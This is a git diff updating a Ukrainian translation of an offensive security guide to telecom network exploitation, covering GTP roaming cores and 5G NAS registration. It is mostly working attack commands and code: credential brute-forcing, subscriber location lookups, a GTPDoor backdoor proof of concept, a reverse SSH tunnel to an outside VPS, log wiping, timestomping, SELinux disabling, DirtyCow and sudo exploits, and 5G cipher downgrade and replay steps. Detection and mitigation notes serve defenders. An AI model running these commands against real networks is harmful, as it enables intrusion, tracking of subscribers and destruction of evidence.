diff --git a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md index f7ff92563..9a26e027d 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md +++ b/src/generic-methodologies-and-resources/pentesting-network/telecom-network-exploitation.md @@ -1,27 +1,27 @@ -# Telecom Network Exploitation (GTP / Roaming Environments) +# Експлуатація телекомунікаційних мереж (GTP / Roaming Environments) {{#include ../../banners/hacktricks-training.md}} > [!NOTE] -> Протоколи мобільної ядра (GPRS Tunnelling Protocol – GTP) часто проходять через напівдостовірні GRX/IPX роумінгові магістралі. Оскільки вони використовують простий UDP з майже без аутентифікації, **будь-яка точка доступу всередині телекомунікаційного периметра зазвичай може безпосередньо досягти основних сигнальних площин**. Наступні нотатки збирають наступальні трюки, спостережені в природі проти SGSN/GGSN, PGW/SGW та інших вузлів EPC. +> Протоколи ядра мобільних мереж (GPRS Tunnelling Protocol – GTP) часто проходять через напівдоверені GRX/IPX roaming backbones. Оскільки вони передаються по plain UDP з майже відсутньою автентифікацією, **будь-яка опора всередині периметру оператора зазвичай може безпосередньо дістатися до центральних signalling planes**. Наступні нотатки збирають offensive tricks, спостережувані в реальному житті проти SGSN/GGSN, PGW/SGW та інших EPC вузлів. -## 1. Recon & Initial Access +## 1. Розвідка та початковий доступ -### 1.1 Default OSS / NE Accounts -Досить велика кількість елементів мережі постачальників постачається з жорстко закодованими SSH/Telnet користувачами, такими як `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Спеціалізований словник значно підвищує успіх брутфорсу: +### 1.1 За замовчуванням OSS / NE облікові записи +Дивно велика кількість елементів мережі від вендорів постачається з вбудованими SSH/Telnet обліковими записами, такими як `root:admin`, `dbadmin:dbadmin`, `cacti:cacti`, `ftpuser:ftpuser`, … Наявність спеціалізованого wordlist значно підвищує успіх brute-force: ```bash hydra -L usernames.txt -P vendor_telecom_defaults.txt ssh://10.10.10.10 -t 8 -o found.txt ``` -Якщо пристрій відкриває лише управлінський VRF, спочатку переходьте через хост-перескок (див. розділ «SGSN Emu Tunnel» нижче). +Якщо пристрій відкриває лише management VRF, спочатку зробіть pivot через jump host (див. розділ «SGSN Emu Tunnel» нижче). -### 1.2 Виявлення хостів всередині GRX/IPX -Більшість операторів GRX все ще дозволяють **ICMP echo** через магістраль. Поєднайте `masscan` з вбудованими UDP-пробами `gtpv1`, щоб швидко відобразити слухачів GTP-C: +### 1.2 Виявлення хостів у GRX/IPX +Більшість операторів GRX досі дозволяють **ICMP echo** через магістраль. Поєднайте `masscan` з вбудованими UDP-пробами `gtpv1`, щоб швидко замапити GTP-C listeners: ```bash masscan 10.0.0.0/8 -pU:2123 --rate 50000 --router-ip 10.0.0.254 --router-mac 00:11:22:33:44:55 ``` -## 2. Перерахунок абонентів – `cordscan` +## 2. Перелічення абонентів – `cordscan` -The following Go tool crafts **GTP-C Create PDP Context Request** packets and logs the responses. Each reply reveals the current **SGSN / MME** serving the queried IMSI and, sometimes, the subscriber’s visited PLMN. +Наступний інструмент на Go формує пакети **GTP-C Create PDP Context Request** і записує відповіді. Кожна відповідь виявляє поточний **SGSN / MME**, що обслуговує запитаний IMSI, а інколи — відвідану PLMN абонента. ```bash # Build GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan @@ -30,21 +30,21 @@ GOOS=linux GOARCH=amd64 go build -o cordscan ./cmd/cordscan ./cordscan --imsi 404995112345678 --oper 40499 -w out.pcap ``` Ключові прапори: -- `--imsi` IMSI цільового абонента +- `--imsi` Цільовий IMSI абонента - `--oper` Домашній / HNI (MCC+MNC) -- `-w` Записати сирі пакети в pcap +- `-w` Записувати raw-пакети у pcap -Важливі константи всередині бінарного файлу можна патчити для розширення сканувань: +Важливі константи всередині бінарного файлу можна запатчити, щоб розширити сканування: ``` pingtimeout = 3 // seconds before giving up pco = 0x218080 common_tcp_ports = "22,23,80,443,8080" ``` -## 3. Виконання коду через GTP – `GTPDoor` +## 3. Code Execution over GTP – `GTPDoor` -`GTPDoor` є маленьким ELF-сервісом, який **прив'язує UDP 2123 та аналізує кожен вхідний GTP-C пакет**. Коли корисне навантаження починається з попередньо поділеного тегу, решта розшифровується (AES-128-CBC) та виконується через `/bin/sh -c`. Стандартний вивід/помилки ексфільтруються всередині **Echo Response** повідомлень, щоб жодна зовнішня сесія ніколи не створювалася. +`GTPDoor` — невеликий ELF-сервіс, який **прив'язується до UDP 2123 і розбирає кожний вхідний GTP-C пакет**. Коли payload починається з pre-shared tag, решта розшифровується (AES-128-CBC) і виконується через `/bin/sh -c`. stdout/stderr ексфільтруються всередині повідомлень **Echo Response**, тож жодна зовнішня сесія ніколи не створюється. -Мінімальний PoC пакет (Python): +Minimal PoC packet (Python): ```python import gtpc, Crypto.Cipher.AES as AES key = b"SixteenByteKey!" @@ -52,40 +52,40 @@ cmd = b"id;uname -a" enc = AES.new(key, AES.MODE_CBC, iv=b"\x00"*16).encrypt(cmd.ljust(32,b"\x00")) print(gtpc.build_echo_req(tag=b"MAG1C", blob=enc)) ``` -Виявлення: -* будь-який хост, що надсилає **незбалансовані Echo запити** до IP-адрес SGSN -* прапор версії GTP, встановлений на 1, коли тип повідомлення = 1 (Echo) – відхилення від специфікації +Detection: +* будь-який host, що надсилає **unbalanced Echo Requests** на SGSN IPs +* GTP version flag set to 1 while message type = 1 (Echo) – відхилення від специфікації -## 4. Пивотування через ядро +## 4. Pivoting через ядро ### 4.1 `sgsnemu` + SOCKS5 -`OsmoGGSN` постачає емулятор SGSN, здатний **встановити PDP контекст до реального GGSN/PGW**. Після переговорів Linux отримує новий інтерфейс `tun0`, доступний з роумінгового пір. +`OsmoGGSN` постачається з емулятором SGSN, здатним **establish a PDP context towards a real GGSN/PGW**. Після узгодження Linux отримує новий інтерфейс `tun0`, доступний з боку roaming peer. ```bash sgsnemu -g 10.1.1.100 -i 10.1.1.10 -m 40499 -s 404995112345678 \ -APN internet -c 1 -d ip route add 172.16.0.0/12 dev tun0 microsocks -p 1080 & # internal SOCKS proxy ``` -З правильним налаштуванням hair-pinning брандмауера, цей тунель обходить VLAN, що використовуються лише для сигналізації, і приземляє вас безпосередньо в **data plane**. +При належному firewall hair-pinning цей тунель обходить signalling-only VLANs і потрапляє безпосередньо в **data plane**. -### 4.2 SSH зворотний тунель через порт 53 -DNS майже завжди відкритий в роумінгових інфраструктурах. Відкрийте внутрішній SSH сервіс на вашому VPS, що слухає на :53, і поверніться пізніше з дому: +### 4.2 SSH Reverse Tunnel over Port 53 +DNS майже завжди відкритий у роумінгових інфраструктурах. Відкрийте внутрішній SSH-сервіс на вашому VPS, що слухає порт :53, і підключіться пізніше з дому: ```bash ssh -f -N -R 0.0.0.0:53:127.0.0.1:22 user@vps.example.com ``` -Перевірте, що `GatewayPorts yes` увімкнено на VPS. +Переконайтеся, що `GatewayPorts yes` увімкнено на VPS. -## 5. Секретні канали +## 5. Приховані канали | Канал | Транспорт | Декодування | Примітки | -|-------|-----------|-------------|----------| -| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-байтовий ключ + 14-байтові частини (XOR) | чистий пасивний слухач, без вихідного трафіку | -| DNS – `NoDepDNS` | UDP 53 | XOR (ключ = `funnyAndHappy`), закодований в октетах A-запису | спостерігає за піддоменом `*.nodep` | -| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC об'єкт у приватному IE | змішується з легітимним GTP-C спілкуванням | +|---------|-----------|----------|-------| +| ICMP – `EchoBackdoor` | ICMP Echo Req/Rep | 4-byte key + 14-byte chunks (XOR) | чисто пасивний прослуховувач, без вихідного трафіку | +| DNS – `NoDepDNS` | UDP 53 | XOR (key = `funnyAndHappy`) encoded in A-record octets | слідкує за піддоменом `*.nodep` | +| GTP – `GTPDoor` | UDP 2123 | AES-128-CBC blob in private IE | маскується під легітимний GTP-C трафік | -Усі імпланти реалізують монітори, які **timestomp** їхні бінарні файли та перезапускаються у разі збою. +Усі імпланти реалізують watchdogs, які **timestomp** їхні бінарні файли та перезапускаються у разі збою. -## 6. Чек-лист ухилення від захисту +## 6. Шпаргалка з ухилення від захисту ```bash # Remove attacker IPs from wtmp utmpdump /var/log/wtmp | sed '/203\.0\.113\.66/d' | utmpdump -r > /tmp/clean && mv /tmp/clean /var/log/wtmp @@ -100,7 +100,7 @@ printf '\0' > /proc/$$/comm # appears as [kworker/1] touch -r /usr/bin/time /usr/bin/chargen # timestomp setenforce 0 # disable SELinux ``` -## 7. Підвищення привілеїв на застарілій NE +## 7. Privilege Escalation на Legacy NE ```bash # DirtyCow – CVE-2016-5195 gcc -pthread dirty.c -o dirty && ./dirty /etc/passwd @@ -116,25 +116,132 @@ python3 exploit_userspec.py userdel firefart 2>/dev/null rm -f /tmp/sh ; history -c ``` -## 8. Інструменти +## 8. Tool Box -* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – спеціалізовані інструменти, описані в попередніх розділах. -* `FScan` : внутрішні TCP сканування (`fscan -p 22,80,443 10.0.0.0/24`) -* `Responder` : LLMNR/NBT-NS підроблений WPAD -* `Microsocks` + `ProxyChains` : легке SOCKS5 півотування -* `FRP` (≥0.37) : обходження NAT / з'єднання активів +* `cordscan`, `GTPDoor`, `EchoBackdoor`, `NoDepDNS` – власні інструменти, описані в попередніх розділах. +* `FScan` : сканування TCP у локальній мережі (`fscan -p 22,80,443 10.0.0.0/24`) +* `Responder` : LLMNR/NBT-NS rogue WPAD +* `Microsocks` + `ProxyChains` : легке SOCKS5 pivoting +* `FRP` (≥0.37) : NAT traversal / asset bridging + +## 9. 5G NAS Registration Attacks: SUCI leaks, downgrade to EEA0/EIA0, and NAS replay + +Процедура реєстрації 5G виконується поверх NAS (Non-Access Stratum) на базі NGAP. Поки NAS security не активовано через Security Mode Command/Complete, початкові повідомлення не автентифіковані і не зашифровані. Це вікно перед активацією безпеки відкриває кілька векторів атаки, якщо ви можете спостерігати або змінювати трафік N2 (наприклад, on-path всередині core, rogue gNB або тестовий стенд). + +Registration flow (simplified): +- Registration Request: UE sends SUCI (encrypted SUPI) and capabilities. +- Authentication: AMF/AUSF send RAND/AUTN; UE returns RES*. +- Security Mode Command/Complete: NAS integrity and ciphering are negotiated and activated. +- PDU Session Establishment: IP/QoS setup. + +Lab setup tips (non-RF): +- Core: Open5GS default deployment is sufficient to reproduce flows. +- UE: simulator or test UE; decode using Wireshark. +- Active tooling: 5GReplay (захоплення/модифікація/повторна відправка NAS в рамках NGAP), Sni5Gect (підслухати/запатчити/вставити NAS на льоту без підняття повного rogue gNB). +- Useful display filters in Wireshark: +- ngap.procedure_code == 15 (InitialUEMessage) +- nas_5g.message_type == 65 or nas-5gs.message_type == 65 (Registration Request) + +### 9.1 Identifier privacy: SUCI failures exposing SUPI/IMSI +Expected: UE/USIM must transmit SUCI (SUPI encrypted with the home-network public key). Finding a plaintext SUPI/IMSI in the Registration Request indicates a privacy defect enabling persistent subscriber tracking. + +How to test: +- Capture the first NAS message in InitialUEMessage and inspect the Mobile Identity IE. +- Wireshark quick checks: +- It should decode as SUCI, not IMSI. +- Filter examples: `nas-5gs.mobile_identity.suci || nas_5g.mobile_identity.suci` should exist; absence plus presence of `imsi` indicates витік. + +What to collect: +- MCC/MNC/MSIN if exposed; log per-UE and track across time/locations. + +Mitigation: +- Enforce SUCI-only UEs/USIMs; alert on any IMSI/SUPI in initial NAS. + +### 9.2 Capability bidding-down to null algorithms (EEA0/EIA0) +Background: +- UE advertises supported EEA (encryption) and EIA (integrity) in the UE Security Capability IE of the Registration Request. +- Common mappings: EEA1/EIA1 = SNOW3G, EEA2/EIA2 = AES, EEA3/EIA3 = ZUC; EEA0/EIA0 are null algorithms. + +Issue: +- Because the Registration Request is not integrity protected, an on-path attacker can clear capability bits to coerce selection of EEA0/EIA0 later during Security Mode Command. Some stacks wrongly allow null algorithms outside emergency services. + +Offensive steps: +- Intercept InitialUEMessage and modify the NAS UE Security Capability to advertise only EEA0/EIA0. +- With Sni5Gect, hook the NAS message and patch the capability bits before forwarding. +- Observe whether AMF accepts null ciphers/integrity and completes Security Mode with EEA0/EIA0. + +Verification/visibility: +- In Wireshark, confirm selected algorithms after Security Mode Command/Complete. +- Example passive sniffer output: +``` +Encyrption in use [EEA0] +Integrity in use [EIA0, EIA1, EIA2] +SUPI (MCC+MNC+MSIN) 9997000000001 +``` +Заходи пом'якшення (обов'язково): +- Налаштуйте AMF/policy так, щоб відкидати EEA0/EIA0, за винятком випадків, коли це суворо вимагається (наприклад, екстрені дзвінки). +- Віддавайте перевагу застосуванню EEA2/EIA2 як мінімум; фіксуйте в логах і піднімайте тривогу для будь-якого NAS security context, який погоджує null алгоритми. + +### 9.3 Replay of initial Registration Request (pre-security NAS) +Оскільки початковий NAS не має цілісності та свіжості, захоплений InitialUEMessage+Registration Request можна відтворити (replay) і надіслати AMF. + +PoC rule for 5GReplay to forward matching replays: +```xml + + + + + + + + + + + +``` +На що звертати увагу: +- Чи приймає AMF replay і переходить до аутентифікації; відсутність перевірки свіжості/зв'язування контексту вказує на вразливість. + +Заходи пом'якшення: +- Забезпечити захист від replay і зв'язування контексту на AMF; застосувати rate-limit і корелювати на рівні per-GNB/UE. + +### 9.4 Tooling pointers (reproducible) +- Open5GS: spin up an AMF/SMF/UPF to emulate core; observe N2 (NGAP) and NAS. +- Wireshark: verify decodes of NGAP/NAS; apply the filters above to isolate Registration. +- 5GReplay: capture a registration, then replay specific NGAP + NAS messages as per the rule. +- Sni5Gect: у режимі live перехоплюйте/змінюйте/впроваджуйте в NAS control-plane, щоб примусити null алгоритми або порушити послідовності аутентифікації. + +### 9.5 Чекліст захисту +- Постійно інспектуйте Registration Request на предмет незашифрованих SUPI/IMSI; блокувати пристрої/USIMs, що порушують правила. +- Відхиляти EEA0/EIA0, за винятком чітко визначених аварійних процедур; вимагати як мінімум EEA2/EIA2. +- Виявляйте підроблену або некоректно сконфігуровану інфраструктуру: неавторизовані gNB/AMF, несподівані N2 peers. +- Генерувати оповіщення про NAS security modes, що призводять до null алгоритмів або частих повторів InitialUEMessage. --- ## Ідеї для виявлення -1. **Будь-який пристрій, окрім SGSN/GGSN, що встановлює запити на створення PDP контексту**. -2. **Нестандартні порти (53, 80, 443), що отримують SSH рукопожаття** з внутрішніх IP-адрес. -3. **Часті Echo запити без відповідних Echo відповідей** – можуть вказувати на сигнали GTPDoor. -4. **Висока частота ICMP echo-reply трафіку з великими, ненульовими полями ідентифікатора/послідовності**. +1. **Будь-який пристрій, відмінний від SGSN/GGSN, який встановлює Create PDP Context Requests**. +2. **Неcтандартні порти (53, 80, 443), що отримують SSH handshakes** з внутрішніх IP. +3. **Часті Echo Requests без відповідних Echo Responses** – може вказувати на GTPDoor beacons. +4. **Висока інтенсивність ICMP echo-reply трафіку з великими, ненульовими полями identifier/sequence**. +5. 5G: **InitialUEMessage, що містить NAS Registration Requests, повторювані з однакових кінцевих точок** (сигнал replay). +6. 5G: **NAS Security Mode, що погоджує EEA0/EIA0** поза аварійними контекстами. ## Посилання -- [Palo Alto Unit42 – Проникнення в глобальні телекомунікаційні мережі](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) -- 3GPP TS 29.060 – Протокол тунелювання GPRS (v16.4.0) +- [Palo Alto Unit42 – Infiltration of Global Telecom Networks](https://unit42.paloaltonetworks.com/infiltration-of-global-telecom-networks/) +- 3GPP TS 29.060 – GPRS Tunnelling Protocol (v16.4.0) - 3GPP TS 29.281 – GTPv2-C (v17.6.0) +- [Demystifying 5G Security: Understanding the Registration Protocol](https://bishopfox.com/blog/demystifying-5g-security-understanding-the-registration-protocol) +- 3GPP TS 24.501 – Non-Access-Stratum (NAS) protocol for 5GS +- 3GPP TS 33.501 – Security architecture and procedures for 5G System {{#include ../../banners/hacktricks-training.md}}